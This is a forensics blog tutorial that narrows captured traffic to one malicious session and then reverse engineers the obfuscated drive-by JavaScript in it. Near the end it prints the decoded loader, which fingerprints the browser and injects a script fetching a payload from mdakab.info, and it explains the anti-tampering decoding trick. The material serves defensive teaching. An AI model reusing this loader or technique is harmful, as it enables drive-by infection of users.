Introduction
In our first post in the forensics and reversing series, we examined why HTTP gzip content encoding is a larger and more serious problem than most people realize. We’ll use the end of the first post as a starting point for analysis in this post. It also serves as an example of something far more important. That is, the very heart of forensics – and something I’d propose is the very definition of forensics. I teach a network forensics and reversing class together with Mike Sconzo about once a month. This is a point I raise at least a dozen times a day in class. That is:
World class forensics engineers are the ones who quickly and intelligently reduce millions of sessions to about a dozen worthy of deeper analysis.
What constitutes quickly? I suppose it depends on the tool being used to perform the analysis, but I’d generalize by saying no more than a couple minutes and/or the same number of clicks. We’ll see this in a moment.
What constitutes intelligently? We can answer this question by looking at a host-based forensics analogy. Suppose you were given a hard disk of a compromised machine and you needed to find the malware. There could be millions of files on the computer, so where do you start? Most of the time, especially for most standard compromises, the following steps will work (this is an over-generalization, but one that works nonetheless):
- Show only PE files (exe, dll, etc.). At this point you’ve probably gone from nearly a million to about 100,000.
- Show only PE files outside the Program Files directory. Here you may go from about a hundred thousand files to tens of thousands.
- Depending on the assumed time of compromise, show only those PE files modified or created in a specific range of days. At this point you should go from tens of thousands to less than 100.
- Since malware tends to be smaller in size, show only those PE files less than 500k. At this point you should be looking at only a handful of files, and most of the time, the malware you’re looking for will be one of them.
As you’ll see next, the same applies to network traffic. We can intelligently go from millions of sessions to only a few by wisely layering traits of network sessions with little attention paid to what is inside those sessions.
Intelligent Network Forensics
Extending the discussion in the previous section (and the previous post in this series), we’ll start with examining a pcap containing about 50,000 sessions (over a gig of traffic) in NetWitness Investigator. Our first pivot is sessions containing nginx webservers. This brings us from 50,000 sessions down to about 300:
Next, we’ll pivot on gzip so we’re only looking at gzip’ed content from nginx servers:
Now we’re down to 33 sessions, but that’s still not good enough. If you figure an average 60 seconds of analysis time per session, that’s still a half hour of analysis just checking to see if there’s something interesting in those sessions. That is a huge waste of time and not intelligent forensics.
In the last post in this series, we combined the above with an examination of traffic from “other” countries. This time we won’t be geopolitically prejudiced. Instead, we’ll pick on top level domains.
Many reports from AV companies show most malware comes from the .com TLD. I think that metric is stupid. (Sorry.) Let’s put aside for a minute the glaring problem with how they define malicious content in the first place. (Or maybe save that discussion for a rant in a separate post.) Most reports showing such metrics never show the total amount of traffic sampled from each TLD. I’m certain .com accounts for the vast majority of that traffic, and that malicious content is a small percentage of the total traffic sourced from .com domains, especially compared to other TLDs like .info and .cc. (In other words, I’d venture that the ratio of legitimate to malicious traffic from .info and .cc domains is drastically different from the same ratio for .com.) Many sponsors charge 99 cents or less per .info or .cc domain registered, making it easy for hackers to register hundreds of throw-away domains en masse, which is why we see such a high percentage of malware coming from those TLDs.
What happens when we add an .info filter to our above pivots? We go from 50,000 sessions down to one.
(Hey Latvia, remember how I said we’d pick on our own country in part 2 of this series?!)
At this point, looking at this single session is an intelligent use of time.
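The layering of pivots can be sketched in a few lines of code. This is only an illustration of the idea, not how NetWitness Investigator works internally: the session records and the field names (server, contentEncoding, host) are hypothetical.

```javascript
// Hypothetical session metadata; the field names are assumptions for illustration.
const sessions = [
  { id: 1, server: "Apache/2.2.14", contentEncoding: "gzip", host: "example.com" },
  { id: 2, server: "nginx/0.7.62", contentEncoding: null, host: "example.org" },
  { id: 3, server: "nginx/0.7.62", contentEncoding: "gzip", host: "example.com" },
  { id: 4, server: "nginx/0.7.62", contentEncoding: "gzip", host: "mdakab.info" },
];

// Each pivot is a cheap test on session traits, not on session content.
const pivots = [
  (s) => s.server.toLowerCase().startsWith("nginx"),
  (s) => s.contentEncoding === "gzip",
  (s) => s.host.toLowerCase().endsWith(".info"),
];

// Apply the pivots one after another, recording how many sessions survive each.
const counts = [];
const remaining = pivots.reduce((current, pivot) => {
  const next = current.filter(pivot);
  counts.push(next.length);
  return next;
}, sessions);

console.log(counts);    // sessions left after each pivot
console.log(remaining); // the handful worth opening by hand
```

The order of the pivots does not change the final set, only how quickly the count drops along the way.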
Here’s what we see in this session:
GET /cgi-bin/guest HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.elitefitness.com/forum/weight-training-weight-lifting/gym-mirrors-where-do-you-get-them-289864.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Connection: Keep-Alive
Host: mdakab.info
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Feb 2010 10:20:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Pragma: no-cache
Content-Encoding: gzip
4EA
……….}Xko….^ ….D.eyg….V..v
..]7h. P.!.$..{m……..Z.ue’6 .1.;3……..~;O_…I…E}._mq.^..m……..)…>/……….b…~4..Z.(….~{#..9.|.~2.)N……..|….*[<[.......=$E.Dt.........z..b.vUV./......|.|..:[}..s>....]t….X.q..6..rN..I..O..\…..p…gV…..L.i.n….u.BW………?..wu..3.Y!…..S:+….}&..pT.V,.=w.
As expected, it’s gzip compressed, although looking at the session in NetWitness Investigator hides that fact by automatically decompressing the contents for us. Also notice the Referer: header in the client’s HTTP request. As the client was referred by a forum, it’s likely that forum is serving advertising containing drive-by attacks, or a link in the forum is tricking people into clicking.
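If you want to reproduce outside of Investigator what it does for us here, the following Node.js sketch may help. It builds a gzip’ed, chunked body from a placeholder HTML string (not the content of the captured session) and then reverses both encodings. The dechunk helper is a hypothetical name and handles only the simple case. The “4EA” line in the response above is the size of the first chunk in hexadecimal.

```javascript
const zlib = require("zlib");

// Placeholder page; NOT the content of the captured session.
const html = "<html><body onload=\"f(0)\">placeholder</body></html>";

// Build a response body the way the server did: gzip, then one HTTP chunk.
const gz = zlib.gzipSync(Buffer.from(html, "utf8"));
const chunked = Buffer.concat([
  Buffer.from(gz.length.toString(16).toUpperCase() + "\r\n", "ascii"),
  gz,
  Buffer.from("\r\n0\r\n\r\n", "ascii"),
]);

// Hypothetical helper: strip chunked transfer encoding
// (ignores chunk extensions and trailers).
function dechunk(body) {
  const parts = [];
  let pos = 0;
  while (pos < body.length) {
    const lineEnd = body.indexOf("\r\n", pos);
    if (lineEnd === -1) break; // truncated body: stop instead of looping forever
    const size = parseInt(body.toString("ascii", pos, lineEnd), 16); // e.g. "4EA" -> 1258
    if (!(size > 0)) break; // a zero-length chunk marks the end
    const start = lineEnd + 2;
    parts.push(body.subarray(start, start + size));
    pos = start + size + 2; // skip the CRLF that follows the chunk data
  }
  return Buffer.concat(parts);
}

const decoded = zlib.gunzipSync(dechunk(chunked)).toString("utf8");
console.log(parseInt("4EA", 16)); // size in bytes of the first chunk in the session above
console.log(decoded === html);
```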
If we take the contents of the session that Investigator automatically decompressed, we see the following (with some formatting added here):
Reverse Engineering the Javascript
Important notes:
1 – Of course, the following steps should NOT be performed on a production system! Furthermore, the system you run these steps on should be fully patched!! Using Visual Studio means the IE scripting engine is used in the debugging process, which could present issues if you’re not careful. I do work like this on a fully patched x64 Windows 2008 system.
2 – The remainder of the post dives into code analysis and using Visual Studio for debugging. If there are basic concepts I failed to cover effectively to make this process easily repeatable for you, please send me an email at gary.golomb to netwitness.com and I will be sure to cover that information in a separate post or video. (In rereading this post, I see some potential gaps. :-/)
This exercise will use two different tools. The first is Visual Studio. If you do not have it already, you can download it free at http://www.microsoft.com/express/Downloads/#2010-Visual-Web-Developer. You will need Visual Web Developer for this exercise, or the all-in-one iso. The second tool is PDFStreamDumper available from: http://sandsprite.com/blogs/index.php?uid=7&pid=57. While other tools could be used for the same tasks we’ll use PDFStreamDumper for, part 3 of this series will focus on PDF reverse engineering and we’ll be using that tool heavily. Might as well get your feet wet with it now!
To fully dissect the javascript sent to the client, we need to debug it step-by-step. To do so, we’ll first create an ASP project in Visual Studio (since that gives us the debug functionality needed to make this much easier). In that project, we’ll remove all the default content created in the page for us by VS, except the first line, and append the content returned by the webserver. Doing so gives us something like the following:
Of course, we can be sure the logic we care about is the javascript, but that is still highly unreadable in one giant line and not in a format that allows for easy debugging. Because of that, we’ll use PDFStreamDumper to help clean it up. First, we open the application, then go into the javascript UI:
Next, we paste the unformatted javascript into the top script pane:
Next, select the Format Javascript selection to make it easier to read:
Although, it’s really not very easy to read yet since the variable names have confusing names like “b_b_x_O3XJ4_qN” and “x__IK_7p_f” that will make it hard to follow references to them as we walk through the code in a moment. Because of this, we’ll also apply the Basic Refactor functionality of PDFStreamDumper to clean up the code a little more:
And the code we want now is in the right-side pane:
We can take the code in the right-side pane and now paste it back into our Visual Studio project from before and it’ll now look something like the following:
Before moving on, let’s examine the HTML in the page to determine how the javascript is used on the client:
On line #1 we see the javascript function is called the moment the page is loaded on the client side without any user interaction. The only value passed to the function is the number 0.
On line #3 and #4 we see two hidden values we can assume are leveraged within the javascript somehow, yet we still need to determine how/why. (I removed the large value from #3 just for the sake of this short examination. It is viewable in the previous display of the code and will be examined again shortly.)
At this point we can set a debug point at the start of the javascript function by clicking in the far-left margin next to the line we want to set the breakpoint:
Then we can start the debugger:
One thing you’ll notice is that Internet Explorer pops up in the background. This is important because it means the technique I’m showing here shows you how IE interprets the javascript, not how Firefox, Opera, Safari, etc. interpret it. Interestingly, they all have subtle differences from each other in that regard. As most malicious javascript targets Windows users running IE, this is a safe method to start with; however, the analysis will be incorrect if the JS is targeting a different browser, operating system, or javascript engine (we’ll see this in later posts).
The yellow line shows the line the debugger will execute next if you hit “step into.” The red box shows the “step into” button:
As you step line-by-line, you can mouse-over a variable to see what it contains before and after you step into it, as the following two examples show:
In the last example, we see gvar_2 was just assigned the value “z.” This should immediately catch your eye as interesting because of line #4 of the HTML code we examined just a minute ago. Gvar_2 got the value “z” through the following steps:
- Gvar_1 was built as an integer array with the values:
- 101
- 111
- 256
- -1
- 120
- 23
- The value at offset 4 in gvar_1 (value = 120, because the array uses zero-based indexing) was incremented by the number two to give the value 122.
- The value 122 was treated as a decimal representation of a letter and fromCharCode() was used to convert it to its corresponding letter. As you can see in the ascii table shown here (http://www.asciitable.com/), 122 is the decimal equivalent of the letter z.
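The steps above can be checked in any javascript console. A minimal sketch, using the array values from the function text quoted in this post:

```javascript
// Values taken from the function text quoted in this post.
const gvar_1 = [101, 111, 256, -1, 120, 23];

// Index 4 holds 120 (zero-based); adding 2 gives 122, the character code for "z".
const gvar_2 = String.fromCharCode(gvar_1[4] + 2);

// charCodeAt() is the inverse of fromCharCode() for a single character.
console.log(gvar_1[4] + 2, gvar_2, gvar_2.charCodeAt(0));
```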
Continuing to the next few lines, we see the following:
In the above, we see:
- thM0X3_Ac0O__Vw is tested to see if it is null, which it is.
- Gvar_3 is assigned the first value in the array gvar_1, which is 101.
- Gvar_3 is reassigned the letter representation of that number using fromCharCode, which is “e”
- Gvar_3 is then added to itself and becomes “ee”
- thM0X3_Ac0O__Vw is then assigned the value of the object in the HTML with the ID “ee,” also shown below:
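Outside a browser, the same steps can be traced with a stand-in for the page. This is a minimal sketch: fakeDocument is a hypothetical replacement for the real DOM, the hidden field’s value is a placeholder, and the use of getElementById for the lookup is my assumption.

```javascript
const gvar_1 = [101, 111, 256, -1, 120, 23];

// Hypothetical stand-in for the page's DOM: one element with the ID "ee".
const fakeDocument = {
  elements: { ee: { value: "<encoded payload placeholder>" } },
  getElementById(id) {
    return this.elements[id] || null;
  },
};

let gvar_3 = gvar_1[0];               // 101
gvar_3 = String.fromCharCode(gvar_3); // "e"
gvar_3 += gvar_3;                     // "ee"

// The ID never appears as a literal; it only exists once the arithmetic has run.
const target = fakeDocument.getElementById(gvar_3);
console.log(gvar_3, target.value);
```

The point of building the ID this way is that a simple text search of the script for “ee” finds nothing.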
So far, so good, right? As you can see, reverse engineering javascript and what it’s doing isn’t too hard. I’ve even been keeping this lower-level than I need to, since we can summarize everything we’ve seen so far by just making the point given in #5 above.
Well, reverse engineering javascript can be this easy, most of the time. Unfortunately, in this case it’s not going to be that easy. A few lines after the above logic, we hit the following. The break point was set at the start of the while loop so you can see the values of each variable as we enter it:
Gvar_5, 6, 7, and 9 are number values. Gvar_8 is an object that is converted to a string and held in gvar_10. You can see the start of the string held in gvar_10 in the locals table at the bottom of the screenshot, but let me include a little more here:
function wg7_I6d_3kg(N__egeg_iCt_C, thM0X3_Ac0O__Vw) {
var gvar_0 = "";
var gvar_1 = new Array(101, 111, 256, -1, 120, 23);
var gvar_2 = String.fromCharCode(gvar_1[4] + 2);
gvar_1[3] = gvar_1[2] * 2;
As you see, gvar_10 is the entire text of the function itself. WHAT?!
This trick has been used in malicious javascript for several years now, but is finally making its way into more mainstream malware (that is, becoming more common). Although the functionality presented by arguments.callee seems totally pointless, it’s actually used in anonymous recursive functions as well as in debug code, as the following example shows:
function testCallee()
{
return arguments.callee;
}
document.write(testCallee());
In the above simple example, the programmer is using arguments.callee to write the function itself to the page displayed, a common test in the process of developing certain types of client-side apps.
However, when used in malicious javascript (as we’re examining), the use of arguments.callee can make the job of reverse engineering JS more difficult. Let’s take a detailed walk through that while loop line-by-line and discuss:
In the first line inside the while loop (red box), gvar_9 has the value zero. Gvar_10 is the entire string of the function itself (also shown in the locals box) as obtained by using arguments.callee, so the letter at index zero in that string is the “f” in the word “function.” charCodeAt() is used to return the number representing that letter, which you can see at http://www.asciitable.com/ and in the locals box is the decimal number 102.
In the next line (shown above), that value is tested to see if it is greater than the value in gvar_6 (which is 47) and less than the value in gvar_7 (which is 58). If you refer back to http://www.asciitable.com/, you’ll see the test is looking only for the ascii characters zero through nine (decimal 48 through 57).
If the value is not an ascii character for a number zero through nine, then gvar_9 is incremented and the while loop continues, as shown:
Let’s examine what happens inside the if statement when an ascii number is encountered:
At line #6 gvar_5 is tested to see if it equals the number four. If so, it is reset to be zero. In this case, this is the first time we have entered the if statement while debugging this code and gvar_5 is still equal to the number zero from its initial assignment earlier in the code.
Skipping over the if statement, we hit line #10 where we see manipulation of gvar_4. I did not address gvar_4 earlier, but here is the code that set up gvar_4 just before the setup of this while loop:
var gvar_4 = new Array(-2, 7, 0, 0);
gvar_4[0] += 2;
gvar_4[1] -= 7;
The array is built with four numbers in it. Gvar_4[0] is equal to -2, but subsequently has +2 added to it. Gvar_4[1] is equal to 7, but subsequently has 7 subtracted from it. As we see, this is just a confusing way of setting up an array with four numbers all equal to zero.
Back to line #10, the first number we hit is the number 7 in this string: “function wg7_I6d_3kg.” The decimal byte value for 7 is 55, so at line #10 the number in index zero (because gvar_5 equals zero at this point) in the array gvar_4 is incremented by the number 55. In this case it is 0 + 55 = 55, but you can see how this number will grow for every number encountered as we walk through the text of the function itself.
Line #11 creates gvar_12 and line #15 resets it, making it a dummy value only inserted for the purpose of confusing us. (Or is it?! You’ll have to answer this again after we see how arguments.callee is being used here.)
Line #12 tests the value we just wrote into the array gvar_4 to see if it’s greater than 512. Because the decimal values for the number zero through nine are 48-57, that test will always evaluate false and will never be entered.
Line #17 increments the counter used as an index pointer for gvar_4 and the loop continues. After the while loop has completed, we hit a for loop that basically just decrements each number in gvar_4 by 256 (given by the number at index 2 inside gvar_1):
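Taken literally, the walkthrough above describes a small checksum over the digits in the function’s own source text. Here is a rough sketch of it. This is my reconstruction, not the original code: digitKey is a hypothetical name, the never-entered branch on line #12 is left out, and the final for loop is assumed to subtract 256 exactly once from each slot.

```javascript
// Hypothetical reconstruction of the loop described above, not the original code.
function digitKey(source) {
  const key = [0, 0, 0, 0]; // plays the role of gvar_4
  let slot = 0;             // plays the role of gvar_5

  for (let i = 0; i < source.length; i++) {
    const code = source.charCodeAt(i);
    if (code > 47 && code < 58) { // ascii "0" through "9"
      if (slot === 4) slot = 0;   // cycle through the four slots
      key[slot] += code;
      slot++;
    }
  }
  // Post-loop adjustment: subtract 256 (the value at gvar_1[2]) from each slot.
  return key.map((v) => v - 256);
}

// Only the digits matter: "7", "6" and "3" have the codes 55, 54 and 51.
console.log(digitKey("function wg7_I6d_3kg"));
```

Run against the full text of the function rather than this short sample, each slot accumulates one code for every fourth digit in the source.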
So why is arguments.callee such a problem?
Because we changed the contents of this function to make it easier to read, understand, and work with! We took all the following:
var aA_nii_C6
var b_b_x_O3XJ4_qN
var e22y8QdoQv_Dta
var f1Gc7_7pPVm_vg
var Ffyncmd8Y
var g2N2c58g_cFcf
var IQ__s_0qI_w_Em5
var jtJuIuDEg
var lEu5nv0
var Lqhs6q0
var N50_648D7_t_k
var Op18mkb
var q0703A5
var Qm_Y__X
var r1Qq5Y3R
var sFFiD1J
var SV5SwoJfj_O
var U__i5_j48r
var x__IK_7p_f
var xyz
And renamed them gvar_1, gvar_2, gvar_3 and so on… That means we removed numbers from the names of variables the decoding algorithm needs to function properly. In other words, in this case, the decoding algorithm is able to determine if the javascript has been tampered with, and if so, it fails to decode properly!
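The effect is easy to reproduce with two functions that differ only in their identifiers. This is a minimal sketch, assuming the function’s text is read with toString(), which yields the same kind of source string the malicious script gets by way of arguments.callee. The names digitSum, original_7x9 and renamed are hypothetical.

```javascript
// Hypothetical helper: add up the character codes of every digit in a string.
function digitSum(text) {
  let sum = 0;
  for (const ch of text) {
    if (ch >= "0" && ch <= "9") sum += ch.charCodeAt(0);
  }
  return sum;
}

// Two functions with identical behavior; only the identifiers differ.
function original_7x9(v_4a) { return v_4a + 1; }
function renamed(value) { return value + 1; }

const before = digitSum(original_7x9.toString());
const after = digitSum(renamed.toString());

// Same behavior, different source text, different checksum.
console.log(original_7x9(1) === renamed(1), before, after, before === after);
```

Any key derived from the first checksum can no longer be derived from the second, even though both functions compute the same thing.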
So the next question is: will the decoding algorithm work if we reformat the javascript to make it easier to follow, without renaming anything (eg: inserting new lines, spaces, tabs, and whitespace to make it easier to read)? So far we have not encountered anything to indicate reformatting the javascript will break decoding. Because of that, I’ll go back to the old naming conventions and just continue the debugging from where we left off. Rerunning everything with the original variable names gets us through the for loop with the following values in the array we previously referred to as gvar_4:
Now things start to get a little more interesting. We hit a while loop that appears to start working on the very long encoded string contained in the hidden HTML object.
Qm_Y__X initially has the value zero and in each pass through the loop is tested to see if its value is less than the number representing the length of the encoded string, presumably making it an index into the string as the decode logic works through decoding the string. The first line inside the while loop takes the next two characters from the index position (currently index zero, making the substring “4g”) and assigns them to o_40M7__5On, while also appending a “^” character.
To understand the next line, we first need to talk about how the parseInt() function works in javascript. It has the following format:
parseInt(string, radix)
The parseInt() function parses a string and returns an integer. The radix parameter is used to specify which numeral system to use. For example, a radix of 16 (hexadecimal) indicates that the number in the string should be parsed from a hexadecimal number to a decimal number.
Also from http://www.w3schools.com/jsref/jsref_parseint.asp:
Tips and Notes
Only the first number in the string is returned!
Leading and trailing spaces are allowed.
If the first character cannot be converted to a number, parseInt() returns NaN.
Now consider the next line:
The string passed to parseInt() is “4g^”. The “^” character is not a valid digit, so parsing stops there and only “4g” is converted. The radix used for every number parsed inside this while loop is 23, in which the letters a through m stand for the values 10 through 22, so “4g” is 4 × 23 + 16 = 108. The next few lines get considerably more complex and make up the heart of this impressive encoding/decoding scheme. We’ll examine them line-by-line as we take a single detailed pass through this while loop.
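It is worth checking this parse by hand, because with a radix of 23 the letter g is itself a digit. A short sketch:

```javascript
// In base 23 the digits are 0-9 followed by a-m (a = 10 ... m = 22).
const pair = "4g";

// "^" is not a valid digit in any radix, so parsing stops right before it.
const parsed = parseInt(pair + "^", 23);

// Same value worked by hand: 4 * 23 + 16 ("g" is 16).
const byHand = 4 * 23 + 16;

console.log(parsed, byHand);
console.log(parseInt("4g^", 10)); // with radix 10 only the leading "4" would be read
```

This is where the 108 used in the rest of the walkthrough comes from.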
We pick up at line #5, where a counter is reset every time it’s equal to the number four. As this is our first time inside the loop, it currently has the value zero.
Jumping over that if statement to line #9, we see the number variable just assigned a value in the previous section where we discussed parseInt(). That number is being decremented by ValueA multiplied by ValueB where:
ValueA is (f1Gc7_7pPVm_vg + 2). The variable f1Gc7_7pPVm_vg starts at the number zero when we first enter this loop, but is incremented with every pass through the loop at line #18, making this variable change for every character evaluated.
ValueB is (g2N2c58g_cFcf[IQ__s_0qI_w_Em5]), where g2N2c58g_cFcf is a number array containing the following values:
It’s important to stop here and draw your attention to the fact that the values inside g2N2c58g_cFcf (the array pictured above) were generated by parsing the text resulting from arguments.callee and applying the math examined when we looked at that first while loop. By trying to change the variable names the way we did to make things easier to reverse, the resulting numbers placed inside the array above would have been totally different, meaning the next few steps would produce completely incorrect results!
In our first step into the loop, IQ__s_0qI_w_Em5 is equal to the number zero, so the value used from the array for this first pass is 251. At line #17, IQ__s_0qI_w_Em5 is incremented with each pass, but line #5 resets it to zero every time it reaches the value four, ensuring the array g2N2c58g_cFcf is cycled through correctly. So in this case, ValueA = 2 and ValueB = 251, and 2 * 251 = 502, which is subtracted from 108 to give the value negative 394. However, line #10 tests to see if the value just computed is less than 0, which of course it always will be!
Line #12 just assigns the value 256 to the variable xyz.
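Line #13 gives us the final decoded value needed by the remainder of the code by taking the value in sFFiD1J (currently -394), which in this case becomes +118 after the execution of that line. That is consistent with adding 256 until the value is positive: -394 + 2 × 256 = 118, and 118 is the decimal value of the letter “v.”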
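Putting the pieces of this pass together gives the rough sketch below. Several things here are assumptions: only the first key value (251) comes from the walkthrough, and the other three are placeholders; negative values are assumed to wrap modulo 256, which matches -394 becoming 118; decode and encode are hypothetical names, and encode is my own inverse, written only to produce input for the sketch.

```javascript
const RADIX = 23;

// Only 251 comes from the walkthrough; the other three values are placeholders.
const key = [251, 7, 19, 42];

function decode(encoded, key) {
  let out = "";
  let slot = 0; // cycles 0..3 through the key
  for (let i = 0, n = 0; i < encoded.length; i += 2, n++) {
    if (slot === 4) slot = 0;
    let value = parseInt(encoded.slice(i, i + 2) + "^", RADIX);
    value -= (n + 2) * key[slot];
    // Assumption: wrap into 0..255, which matches -394 becoming 118.
    value = ((value % 256) + 256) % 256;
    out += String.fromCharCode(value);
    slot++;
  }
  return out;
}

// Hypothetical inverse, used only to produce input for the sketch.
function encode(plain, key) {
  let out = "";
  for (let n = 0; n < plain.length; n++) {
    const value = (plain.charCodeAt(n) + (n + 2) * key[n % 4]) % 256;
    out += value.toString(RADIX).padStart(2, "0");
  }
  return out;
}

const sample = encode("var x = 1;", key);
console.log(sample.slice(0, 2));  // the pair that encodes the leading "v"
console.log(decode(sample, key)); // round trip back to the plain text
```

With the first key value set to 251, the letter “v” encodes to the pair “4g”, the same pair the real payload starts with.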
Line #15 gradually builds a string by appending each newly decoded value to it and lines #16-18 are just pointer updating as discussed already. If we remove our breakpoint in the loop and let it complete (but add a new breakpoint after the loop so we can examine variables when it’s complete), here is the final value of the string containing the fully decoded contents of the encoded HTML object:
var ght0jcY_f1c = -1;var DMv_m70U81LIb = "01";var tI__JGR85k__254 = navigator.appMinorVersion;while((ght0jcY_f1c = tI__JGR85k__254.indexOf(";SP", ght0jcY_f1c + 1)) != -1) {var RC_Vt__07 = tI__JGR85k__254.charAt(ght0jcY_f1c + 3);if (RC_Vt__07 == "1")DMv_m70U81LIb = "02";else if (RC_Vt__07 == "2")DMv_m70U81LIb = "03";else if (RC_Vt__07 == "3")DMv_m70U81LIb = "04";else if (RC_Vt__07 == "4")DMv_m70U81LIb = "05";else if (RC_Vt__07 == "5")DMv_m70U81LIb = "06";else if (RC_Vt__07 == "6")DMv_m70U81LIb = "07";if (DMv_m70U81LIb != "01")break;}if (DMv_m70U81LIb == "01" && tI__JGR85k__254.indexOf("Release Candidate", 0) != -1)DMv_m70U81LIb = "08";var RihOuI_7K = "2" + DMv_m70U81LIb;var W118_aA4eh4O;if (!(W118_aA4eh4O = navigator.systemLanguage)) {if (!(W118_aA4eh4O = navigator.userLanguage)) {if (!(W118_aA4eh4O = navigator.browserLanguage)) {W118_aA4eh4O = navigator.language;}}}if (W118_aA4eh4O) {W118_aA4eh4O = W118_aA4eh4O.substr(0, 10);var QS743__js_4 = "";for(var H4_p__kQ4 = 0; H4_p__kQ4 < W118_aA4eh4O.length; H4_p__kQ4++) {var DL___q0_RU54_T = W118_aA4eh4O.charCodeAt(H4_p__kQ4).toString(16);if (DL___q0_RU54_T < 2)QS743__js_4 += "0";QS743__js_4 += DL___q0_RU54_T;}while(QS743__js_4.length < 20) {QS743__js_4 += "00";}RihOuI_7K += "L" + QS743__js_4;}var f_Ha0lc_a_1_P = document.createElement("script");f_Ha0lc_a_1_P.setAttribute("type", "text/javascript");f_Ha0lc_a_1_P.setAttribute("src", "http://mdakab.info/cgi-bin/guest/y002106R09007318X86487362Ycd32e585Z0100f060" + RihOuI_7K);document.body.appendChild(f_Ha0lc_a_1_P);
As you see, it decodes into more new javascript. But, we still need to see how it’s leveraged, which the last few lines of the code we’re currently debugging will show us:
First, the red box shows the variable b_b_x_O3XJ4_qN being assigned the value “e.”
The next line appends the string “value” to it, making the new contents of b_b_x_O3XJ4_qN “evalue.”
The following line reassigns it as a substring of the original value, in this case the first four letters of “evalue,” or “eval.”
The final line is the equivalent of this.window["eval"](string), where the string is the newly decoded javascript, so this javascript is turning around and executing the newly decoded script.
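The way the function name is assembled can be tried safely outside the browser. In this minimal sketch globalThis stands in for the browser’s window object, and decodedScript is a harmless placeholder rather than the real decoded payload.

```javascript
// Rebuild the function name the way the script does.
let name = "e";
name += "value";             // "evalue"
name = name.substring(0, 4); // "eval"

// Harmless stand-in for the decoded script.
const decodedScript = "6 * 7";

// Property lookup by string: the word "eval" never appears as a call in the source.
const result = globalThis[name](decodedScript);
console.log(name, result);
```

This is why searching obfuscated javascript for a literal call to eval is not a reliable way to find where the payload gets executed.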
Rather than take a detailed walk through the analysis of the newly decoded javascript, I’ll leave it as an exercise for you. Don’t worry – there’s no use of arguments.callee, so it’s much easier to work with!! Feel free to reformat it and rename variables to make it easier to read. You can create a new website in Visual Studio and debug it the same way. This time we only have the javascript here, so you’ll need to manually add the HTML needed to get it to execute, as you can see in the following example. Notice I used the same technique they did to get the javascript to execute as soon as the page is loaded (meaning you can just add a breakpoint to the top line of the javascript).
Here is the new javascript with formatting:
And here is the raw text of the javascript, if you would like to download it and analyze it using the same techniques: http://pastebin.com/raw.php?i=vPeBF37r
Important note!!
Although the URL in line #39 is displayed intact above, when debugging please remove the string “mdakab.info” to prevent the network activity from taking place accidentally (and executing logic you can’t yet debug easily).
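If you would rather not edit the script by hand, the hostname can be stripped from the text before it goes into the debugger. This is a minimal sketch: defang is a hypothetical helper, and the script text below is a shortened stand-in with a placeholder path, not the real decoded script.

```javascript
// Hypothetical helper: blank out a hostname wherever it appears in script text.
function defang(scriptText, host) {
  return scriptText.split(host).join("");
}

// Shortened stand-in for the decoded script; the path is a placeholder.
const decoded = 'el.setAttribute("src", "http://mdakab.info/cgi-bin/guest/PLACEHOLDER");';

const safe = defang(decoded, "mdakab.info");
console.log(safe);
console.log(safe.includes("mdakab.info"));
```

Using split and join rather than a regular expression avoids having to escape the dot in the hostname.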
Back to the network activity
So we just took a VERY deep dive into javascript reverse engineering. If you look at the follow-on data in this session, we could explain why it happened based on what we just did.
But... did the work we just did seem like a waste of time? I mean, the activity is in the network traffic, so we can just examine the behavior of the javascript based on what happened after the client got it.
That’s entirely true! If you reverse JS like this every time you see it, that is an enormous waste of time. However, the next post in this series will focus on the PDF file the javascript in this session eventually grabs and executes. There will be JS inside of there and we’ll need to know how to reverse it, so this post is really just the basis for the next in this series.
At this point we also have a domain name from the embedded JS we can use to do the type of internet research shown at the bottom of the first post in this series. We’ll expand that line of analysis in further posts in this series also…
Gary Golomb